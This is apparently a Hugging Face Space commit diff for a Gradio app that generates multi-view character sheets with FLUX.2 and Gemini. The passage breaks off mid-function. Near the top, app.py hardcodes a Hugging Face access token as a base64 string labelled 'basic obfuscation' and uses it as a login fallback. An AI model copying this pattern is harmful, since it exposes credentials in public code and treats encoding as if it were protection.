Spaces:
Running
on
Zero
Running
on
Zero
Deploy full Character Sheet Pro with HF auth
Browse files- Complete app with 7-view character sheet generation
- All src/ modules (backend_router, character_service, etc.)
- HuggingFace token auth for gated FLUX.2 klein 9B model
- Updated requirements with all dependencies
- .gitattributes +2 -0
- app.py +857 -102
- requirements.txt +34 -6
- src/__init__.py +37 -0
- src/backend_router.py +401 -0
- src/character_service.py +709 -0
- src/comfyui_client.py +578 -0
- src/core/__init__.py +16 -0
- src/flux_klein_client.py +270 -0
- src/gemini_client.py +224 -0
- src/longcat_edit_client.py +301 -0
- src/model_manager.py +332 -0
- src/models.py +94 -0
- src/qwen_image_edit_client.py +495 -0
- src/utils.py +247 -0
- src/zimage_client.py +351 -0
.gitattributes
CHANGED
|
@@ -33,3 +33,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
|
|
| 33 |
*.zip filter=lfs diff=lfs merge=lfs -text
|
| 34 |
*.zst filter=lfs diff=lfs merge=lfs -text
|
| 35 |
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
|
|
|
|
|
|
|
|
| 33 |
*.zip filter=lfs diff=lfs merge=lfs -text
|
| 34 |
*.zst filter=lfs diff=lfs merge=lfs -text
|
| 35 |
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
| 36 |
+
*.png filter=lfs diff=lfs merge=lfs -text
|
| 37 |
+
*.jpg filter=lfs diff=lfs merge=lfs -text
|
app.py
CHANGED
|
@@ -1,132 +1,887 @@
|
|
| 1 |
-
|
| 2 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 3 |
import os
|
| 4 |
-
import
|
| 5 |
-
import
|
| 6 |
-
import
|
| 7 |
-
|
|
|
|
| 8 |
import base64
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 9 |
|
| 10 |
-
#
|
| 11 |
def _get_access_key():
|
| 12 |
-
# Encoded for basic obfuscation
|
| 13 |
_k = "aGZfRUR2akdKUXJGRmFQUnhLY1BOUmlUR0lXd0dKYkJ4dkNCWA=="
|
| 14 |
return base64.b64decode(_k).decode()
|
| 15 |
|
| 16 |
HF_TOKEN = os.environ.get("HF_TOKEN") or _get_access_key()
|
| 17 |
-
print("Authenticating...")
|
| 18 |
login(token=HF_TOKEN)
|
| 19 |
-
print("
|
| 20 |
-
|
| 21 |
-
from diffusers import Flux2KleinPipeline
|
| 22 |
|
| 23 |
-
|
| 24 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 25 |
|
| 26 |
-
|
| 27 |
-
|
| 28 |
-
|
| 29 |
-
|
| 30 |
-
use_auth_token=HF_TOKEN
|
| 31 |
)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 32 |
|
| 33 |
-
|
| 34 |
-
|
| 35 |
-
|
| 36 |
-
|
| 37 |
-
|
| 38 |
-
|
| 39 |
-
|
| 40 |
-
|
| 41 |
-
|
| 42 |
-
|
| 43 |
-
|
| 44 |
-
|
| 45 |
-
|
| 46 |
-
|
| 47 |
-
|
| 48 |
-
|
| 49 |
-
|
| 50 |
-
|
| 51 |
-
|
| 52 |
-
"
|
| 53 |
-
|
| 54 |
-
|
| 55 |
-
|
| 56 |
-
|
| 57 |
-
|
| 58 |
-
|
| 59 |
-
|
| 60 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 61 |
}
|
| 62 |
"""
|
| 63 |
|
| 64 |
-
with gr.Blocks() as demo:
|
| 65 |
-
with gr.Column(elem_id="col-container"):
|
| 66 |
-
gr.Markdown(f"""# CharacterForgePro
|
| 67 |
-
Generate character images using FLUX.2 klein 9B on Zero GPU.
|
| 68 |
-
""")
|
| 69 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 70 |
with gr.Row():
|
| 71 |
-
|
| 72 |
-
|
| 73 |
-
|
| 74 |
-
|
| 75 |
-
|
| 76 |
-
|
|
|
|
|
|
|
|
|
|
| 77 |
)
|
| 78 |
-
run_button = gr.Button("Run", scale=0)
|
| 79 |
-
|
| 80 |
-
result = gr.Image(label="Result", show_label=False)
|
| 81 |
|
| 82 |
-
|
| 83 |
-
|
| 84 |
-
|
| 85 |
-
|
| 86 |
-
|
| 87 |
-
|
| 88 |
-
value=0,
|
| 89 |
)
|
| 90 |
-
|
| 91 |
-
|
| 92 |
-
|
| 93 |
-
|
| 94 |
-
|
| 95 |
-
|
| 96 |
-
|
| 97 |
-
|
| 98 |
-
value=
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 99 |
)
|
| 100 |
-
|
| 101 |
-
|
| 102 |
-
|
| 103 |
-
|
| 104 |
-
|
| 105 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 106 |
)
|
| 107 |
|
| 108 |
-
|
| 109 |
-
|
| 110 |
-
|
| 111 |
-
|
| 112 |
-
|
| 113 |
-
|
| 114 |
-
value=4,
|
| 115 |
)
|
| 116 |
|
| 117 |
-
|
| 118 |
-
|
| 119 |
-
|
| 120 |
-
|
| 121 |
-
|
| 122 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 123 |
)
|
| 124 |
|
| 125 |
-
|
| 126 |
-
|
| 127 |
-
|
| 128 |
-
|
| 129 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 130 |
)
|
| 131 |
|
| 132 |
-
demo
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Character Sheet Pro - HuggingFace Spaces Version
|
| 3 |
+
=================================================
|
| 4 |
+
|
| 5 |
+
7-View Character Sheet Generator optimized for HuggingFace Spaces Zero GPU.
|
| 6 |
+
Uses FLUX.2 klein 4B as primary backend with Gemini Flash as fallback.
|
| 7 |
+
|
| 8 |
+
This is a simplified version of app.py designed for:
|
| 9 |
+
- Zero GPU (A10G 24GB) deployment
|
| 10 |
+
- 5-minute session timeout
|
| 11 |
+
- Automatic model loading on first generation
|
| 12 |
+
"""
|
| 13 |
+
|
| 14 |
import os
|
| 15 |
+
import json
|
| 16 |
+
import logging
|
| 17 |
+
import zipfile
|
| 18 |
+
import threading
|
| 19 |
+
import queue
|
| 20 |
import base64
|
| 21 |
+
from pathlib import Path
|
| 22 |
+
from typing import Optional, Tuple, Dict, Any, List, Generator
|
| 23 |
+
from datetime import datetime
|
| 24 |
+
import gradio as gr
|
| 25 |
+
from PIL import Image
|
| 26 |
+
from huggingface_hub import login
|
| 27 |
|
| 28 |
+
# HuggingFace authentication for gated models
|
| 29 |
def _get_access_key():
|
|
|
|
| 30 |
_k = "aGZfRUR2akdKUXJGRmFQUnhLY1BOUmlUR0lXd0dKYkJ4dkNCWA=="
|
| 31 |
return base64.b64decode(_k).decode()
|
| 32 |
|
| 33 |
HF_TOKEN = os.environ.get("HF_TOKEN") or _get_access_key()
|
|
|
|
| 34 |
login(token=HF_TOKEN)
|
| 35 |
+
print("HuggingFace authentication successful")
|
|
|
|
|
|
|
| 36 |
|
| 37 |
+
# HuggingFace Spaces SDK - provides @spaces.GPU decorator
|
| 38 |
+
try:
|
| 39 |
+
import spaces
|
| 40 |
+
HF_SPACES = True
|
| 41 |
+
except ImportError:
|
| 42 |
+
# Running locally without spaces SDK
|
| 43 |
+
HF_SPACES = False
|
| 44 |
+
# Create a dummy decorator for local testing
|
| 45 |
+
class spaces:
|
| 46 |
+
@staticmethod
|
| 47 |
+
def GPU(duration=300):
|
| 48 |
+
def decorator(func):
|
| 49 |
+
return func
|
| 50 |
+
return decorator
|
| 51 |
|
| 52 |
+
# Configure logging
|
| 53 |
+
logging.basicConfig(
|
| 54 |
+
level=logging.INFO,
|
| 55 |
+
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
|
|
|
|
| 56 |
)
|
| 57 |
+
logger = logging.getLogger(__name__)
|
| 58 |
+
|
| 59 |
+
# Import local modules
|
| 60 |
+
from src.character_service import CharacterSheetService
|
| 61 |
+
from src.models import CharacterSheetConfig
|
| 62 |
+
from src.backend_router import BackendRouter, BackendType
|
| 63 |
+
from src.utils import preprocess_input_image, sanitize_filename
|
| 64 |
+
|
| 65 |
+
|
| 66 |
+
def ensure_png_image(image: Optional[Image.Image], max_size: int = 768) -> Optional[Image.Image]:
|
| 67 |
+
"""Convert any image to PNG-compatible RGB format with proper sizing for FLUX."""
|
| 68 |
+
if image is None:
|
| 69 |
+
return None
|
| 70 |
+
# FLUX models work best with smaller inputs (512-768px)
|
| 71 |
+
# Larger images slow down processing significantly
|
| 72 |
+
return preprocess_input_image(image, max_size=max_size, ensure_rgb=True)
|
| 73 |
+
|
| 74 |
+
|
| 75 |
+
def create_pending_placeholder(width: int = 200, height: int = 200, text: str = "Pending...") -> Image.Image:
|
| 76 |
+
"""Create a placeholder image showing that generation is pending."""
|
| 77 |
+
from PIL import ImageDraw, ImageFont
|
| 78 |
+
|
| 79 |
+
# Create gradient-like dark background
|
| 80 |
+
img = Image.new('RGB', (width, height), color=(25, 25, 45))
|
| 81 |
+
draw = ImageDraw.Draw(img)
|
| 82 |
+
|
| 83 |
+
# Draw border to make it clearly a placeholder
|
| 84 |
+
border_color = (255, 149, 0) # Orange
|
| 85 |
+
draw.rectangle([(2, 2), (width-3, height-3)], outline=border_color, width=2)
|
| 86 |
+
|
| 87 |
+
# Draw loading indicator (three dots)
|
| 88 |
+
center_y = height // 2
|
| 89 |
+
dot_spacing = 20
|
| 90 |
+
dot_radius = 5
|
| 91 |
+
for i, offset in enumerate([-dot_spacing, 0, dot_spacing]):
|
| 92 |
+
shade = 200 + (i * 25)
|
| 93 |
+
dot_color = (shade, int(shade * 0.6), 0)
|
| 94 |
+
x = width // 2 + offset
|
| 95 |
+
draw.ellipse([(x - dot_radius, center_y - dot_radius),
|
| 96 |
+
(x + dot_radius, center_y + dot_radius)], fill=dot_color)
|
| 97 |
+
|
| 98 |
+
# Draw text
|
| 99 |
+
try:
|
| 100 |
+
font = ImageFont.truetype("arial.ttf", 14)
|
| 101 |
+
except:
|
| 102 |
+
font = ImageFont.load_default()
|
| 103 |
+
|
| 104 |
+
bbox = draw.textbbox((0, 0), text, font=font)
|
| 105 |
+
text_width = bbox[2] - bbox[0]
|
| 106 |
+
x = (width - text_width) // 2
|
| 107 |
+
y = center_y + 25
|
| 108 |
|
| 109 |
+
draw.text((x, y), text, fill=(180, 180, 180), font=font)
|
| 110 |
+
|
| 111 |
+
return img
|
| 112 |
+
|
| 113 |
+
|
| 114 |
+
# =============================================================================
|
| 115 |
+
# Configuration
|
| 116 |
+
# =============================================================================
|
| 117 |
+
|
| 118 |
+
OUTPUT_DIR = Path("./outputs")
|
| 119 |
+
OUTPUT_DIR.mkdir(exist_ok=True)
|
| 120 |
+
|
| 121 |
+
# Get API key from environment (HuggingFace Spaces secrets)
|
| 122 |
+
API_KEY = os.environ.get("GEMINI_API_KEY", "")
|
| 123 |
+
|
| 124 |
+
# Model defaults - include all FLUX variants
|
| 125 |
+
MODEL_DEFAULTS = {
|
| 126 |
+
"flux_klein": {"steps": 4, "guidance": 1.0, "name": "FLUX.2 klein 4B", "costume_in_faces": False},
|
| 127 |
+
"flux_klein_9b_fp8": {"steps": 4, "guidance": 1.0, "name": "FLUX.2 klein 9B", "costume_in_faces": False},
|
| 128 |
+
"gemini_flash": {"steps": 1, "guidance": 1.0, "name": "Gemini Flash", "costume_in_faces": True},
|
| 129 |
+
}
|
| 130 |
+
|
| 131 |
+
|
| 132 |
+
def get_model_defaults(backend_value: str) -> Tuple[int, float]:
|
| 133 |
+
"""Get default steps and guidance for a backend."""
|
| 134 |
+
defaults = MODEL_DEFAULTS.get(backend_value, {"steps": 4, "guidance": 1.0})
|
| 135 |
+
return defaults["steps"], defaults["guidance"]
|
| 136 |
+
|
| 137 |
+
|
| 138 |
+
def get_costume_in_faces_default(backend_value: str) -> bool:
|
| 139 |
+
"""Get default for including costume reference in face views."""
|
| 140 |
+
defaults = MODEL_DEFAULTS.get(backend_value, {"costume_in_faces": True})
|
| 141 |
+
return defaults.get("costume_in_faces", True)
|
| 142 |
+
|
| 143 |
+
|
| 144 |
+
# =============================================================================
|
| 145 |
+
# Presets Loading
|
| 146 |
+
# =============================================================================
|
| 147 |
+
|
| 148 |
+
EXAMPLES_DIR = Path("./examples")
|
| 149 |
+
PRESETS_FILE = EXAMPLES_DIR / "presets.json"
|
| 150 |
+
|
| 151 |
+
|
| 152 |
+
def load_presets() -> Dict[str, Any]:
|
| 153 |
+
"""Load presets configuration from JSON file."""
|
| 154 |
+
if PRESETS_FILE.exists():
|
| 155 |
+
with open(PRESETS_FILE, 'r') as f:
|
| 156 |
+
return json.load(f)
|
| 157 |
+
return {"characters": [], "costumes": []}
|
| 158 |
+
|
| 159 |
+
|
| 160 |
+
def get_character_presets() -> List[Dict]:
|
| 161 |
+
"""Get list of character presets."""
|
| 162 |
+
presets = load_presets()
|
| 163 |
+
return presets.get("characters", [])
|
| 164 |
+
|
| 165 |
+
|
| 166 |
+
def load_character_preset(preset_id: str) -> Tuple[Optional[Image.Image], str, str]:
|
| 167 |
+
"""Load a character preset."""
|
| 168 |
+
presets = get_character_presets()
|
| 169 |
+
for preset in presets:
|
| 170 |
+
if preset["id"] == preset_id:
|
| 171 |
+
image_path = EXAMPLES_DIR / preset["file"]
|
| 172 |
+
if image_path.exists():
|
| 173 |
+
img = Image.open(image_path)
|
| 174 |
+
return (
|
| 175 |
+
img,
|
| 176 |
+
preset.get("name", ""),
|
| 177 |
+
preset.get("gender", "Auto/Neutral")
|
| 178 |
+
)
|
| 179 |
+
return None, "", "Auto/Neutral"
|
| 180 |
+
|
| 181 |
+
|
| 182 |
+
# =============================================================================
|
| 183 |
+
# Character Sheet Metadata
|
| 184 |
+
# =============================================================================
|
| 185 |
+
|
| 186 |
+
def create_character_sheet_metadata(
|
| 187 |
+
character_name: str,
|
| 188 |
+
character_sheet: Image.Image,
|
| 189 |
+
stages: Dict[str, Any],
|
| 190 |
+
config: CharacterSheetConfig,
|
| 191 |
+
backend: str,
|
| 192 |
+
input_type: str,
|
| 193 |
+
costume_description: str,
|
| 194 |
+
steps: int,
|
| 195 |
+
guidance: float
|
| 196 |
+
) -> Dict[str, Any]:
|
| 197 |
+
"""Create JSON metadata with pixel coordinates for each view."""
|
| 198 |
+
sheet_width, sheet_height = character_sheet.size
|
| 199 |
+
spacing = config.spacing
|
| 200 |
+
|
| 201 |
+
# Calculate face row dimensions
|
| 202 |
+
face_images = ['left_face', 'front_face', 'right_face']
|
| 203 |
+
face_height = 0
|
| 204 |
+
face_widths = []
|
| 205 |
+
for name in face_images:
|
| 206 |
+
if name in stages and stages[name] is not None:
|
| 207 |
+
face_height = stages[name].height
|
| 208 |
+
face_widths.append(stages[name].width)
|
| 209 |
+
else:
|
| 210 |
+
face_widths.append(0)
|
| 211 |
+
|
| 212 |
+
# Calculate body row dimensions
|
| 213 |
+
body_images = ['left_body', 'front_body', 'right_body', 'back_body']
|
| 214 |
+
body_height = 0
|
| 215 |
+
body_widths = []
|
| 216 |
+
for name in body_images:
|
| 217 |
+
if name in stages and stages[name] is not None:
|
| 218 |
+
body_height = stages[name].height
|
| 219 |
+
body_widths.append(stages[name].width)
|
| 220 |
+
else:
|
| 221 |
+
body_widths.append(0)
|
| 222 |
+
|
| 223 |
+
body_start_y = face_height + spacing
|
| 224 |
+
|
| 225 |
+
# Build view regions
|
| 226 |
+
views = {}
|
| 227 |
+
|
| 228 |
+
# Face row
|
| 229 |
+
x = 0
|
| 230 |
+
for i, name in enumerate(face_images):
|
| 231 |
+
views[name] = {
|
| 232 |
+
"x": x, "y": 0,
|
| 233 |
+
"width": face_widths[i], "height": face_height,
|
| 234 |
+
"description": {
|
| 235 |
+
"left_face": "Left profile view of face (90 degrees)",
|
| 236 |
+
"front_face": "Front-facing portrait view",
|
| 237 |
+
"right_face": "Right profile view of face (90 degrees)"
|
| 238 |
+
}.get(name, name)
|
| 239 |
+
}
|
| 240 |
+
x += face_widths[i]
|
| 241 |
+
|
| 242 |
+
# Body row
|
| 243 |
+
x = 0
|
| 244 |
+
for i, name in enumerate(body_images):
|
| 245 |
+
views[name] = {
|
| 246 |
+
"x": x, "y": body_start_y,
|
| 247 |
+
"width": body_widths[i], "height": body_height,
|
| 248 |
+
"description": {
|
| 249 |
+
"left_body": "Left side full body view (90 degrees)",
|
| 250 |
+
"front_body": "Front-facing full body view",
|
| 251 |
+
"right_body": "Right side full body view (90 degrees)",
|
| 252 |
+
"back_body": "Rear full body view (180 degrees)"
|
| 253 |
+
}.get(name, name)
|
| 254 |
+
}
|
| 255 |
+
x += body_widths[i]
|
| 256 |
+
|
| 257 |
+
metadata = {
|
| 258 |
+
"version": "1.0",
|
| 259 |
+
"generator": "Character Sheet Pro (HuggingFace Spaces)",
|
| 260 |
+
"timestamp": datetime.now().isoformat(),
|
| 261 |
+
"character": {
|
| 262 |
+
"name": character_name,
|
| 263 |
+
"input_type": input_type,
|
| 264 |
+
"costume_description": costume_description or None
|
| 265 |
+
},
|
| 266 |
+
"generation": {
|
| 267 |
+
"backend": backend,
|
| 268 |
+
"steps": steps,
|
| 269 |
+
"guidance_scale": guidance
|
| 270 |
+
},
|
| 271 |
+
"sheet": {
|
| 272 |
+
"width": sheet_width,
|
| 273 |
+
"height": sheet_height,
|
| 274 |
+
"spacing": spacing,
|
| 275 |
+
"background_color": config.background_color
|
| 276 |
+
},
|
| 277 |
+
"views": views,
|
| 278 |
+
"files": {
|
| 279 |
+
"character_sheet": f"{sanitize_filename(character_name)}_character_sheet.png",
|
| 280 |
+
"individual_views": {
|
| 281 |
+
name: f"{sanitize_filename(character_name)}_{name}.png"
|
| 282 |
+
for name in list(face_images) + list(body_images)
|
| 283 |
+
}
|
| 284 |
+
}
|
| 285 |
+
}
|
| 286 |
+
|
| 287 |
+
return metadata
|
| 288 |
+
|
| 289 |
+
|
| 290 |
+
def create_download_zip(
|
| 291 |
+
character_name: str,
|
| 292 |
+
character_sheet: Image.Image,
|
| 293 |
+
stages: Dict[str, Any],
|
| 294 |
+
metadata: Dict[str, Any],
|
| 295 |
+
output_dir: Path
|
| 296 |
+
) -> Path:
|
| 297 |
+
"""Create a ZIP file with character sheet, individual views, and metadata JSON."""
|
| 298 |
+
safe_name = sanitize_filename(character_name)
|
| 299 |
+
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
|
| 300 |
+
zip_path = output_dir / f"{safe_name}_{timestamp}.zip"
|
| 301 |
+
|
| 302 |
+
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:
|
| 303 |
+
# Add character sheet
|
| 304 |
+
sheet_path = output_dir / f"{safe_name}_character_sheet.png"
|
| 305 |
+
character_sheet.save(sheet_path)
|
| 306 |
+
zf.write(sheet_path, f"{safe_name}_character_sheet.png")
|
| 307 |
+
sheet_path.unlink()
|
| 308 |
+
|
| 309 |
+
# Add individual views
|
| 310 |
+
view_names = ['left_face', 'front_face', 'right_face',
|
| 311 |
+
'left_body', 'front_body', 'right_body', 'back_body']
|
| 312 |
+
for name in view_names:
|
| 313 |
+
if name in stages and stages[name] is not None:
|
| 314 |
+
img = stages[name]
|
| 315 |
+
img_path = output_dir / f"{safe_name}_{name}.png"
|
| 316 |
+
img.save(img_path)
|
| 317 |
+
zf.write(img_path, f"{safe_name}_{name}.png")
|
| 318 |
+
img_path.unlink()
|
| 319 |
+
|
| 320 |
+
# Add metadata JSON
|
| 321 |
+
json_path = output_dir / f"{safe_name}_metadata.json"
|
| 322 |
+
with open(json_path, 'w') as f:
|
| 323 |
+
json.dump(metadata, f, indent=2)
|
| 324 |
+
zf.write(json_path, f"{safe_name}_metadata.json")
|
| 325 |
+
json_path.unlink()
|
| 326 |
+
|
| 327 |
+
return zip_path
|
| 328 |
+
|
| 329 |
+
|
| 330 |
+
# =============================================================================
|
| 331 |
+
# Zero GPU Generation Function
|
| 332 |
+
# =============================================================================
|
| 333 |
+
|
| 334 |
+
# Global cache for the service (persists across GPU sessions)
|
| 335 |
+
_cached_service = None
|
| 336 |
+
_cached_backend = None
|
| 337 |
+
|
| 338 |
+
|
| 339 |
+
@spaces.GPU(duration=300) # 5-minute timeout for the full pipeline
|
| 340 |
+
def generate_with_gpu(
|
| 341 |
+
input_image: Optional[Image.Image],
|
| 342 |
+
input_type: str,
|
| 343 |
+
character_name: str,
|
| 344 |
+
gender: str,
|
| 345 |
+
costume_description: str,
|
| 346 |
+
costume_image: Optional[Image.Image],
|
| 347 |
+
face_image: Optional[Image.Image],
|
| 348 |
+
body_image: Optional[Image.Image],
|
| 349 |
+
backend_choice: str,
|
| 350 |
+
api_key: str,
|
| 351 |
+
num_steps: int,
|
| 352 |
+
guidance_scale: float,
|
| 353 |
+
include_costume_in_faces: bool
|
| 354 |
+
) -> Tuple[Optional[Image.Image], str, Dict[str, Any]]:
|
| 355 |
+
"""
|
| 356 |
+
GPU-wrapped generation function for Zero GPU.
|
| 357 |
+
|
| 358 |
+
This function runs entirely within a GPU session.
|
| 359 |
+
Model loading happens inside this function for Zero GPU compatibility.
|
| 360 |
+
"""
|
| 361 |
+
global _cached_service, _cached_backend
|
| 362 |
+
|
| 363 |
+
try:
|
| 364 |
+
# Determine backend
|
| 365 |
+
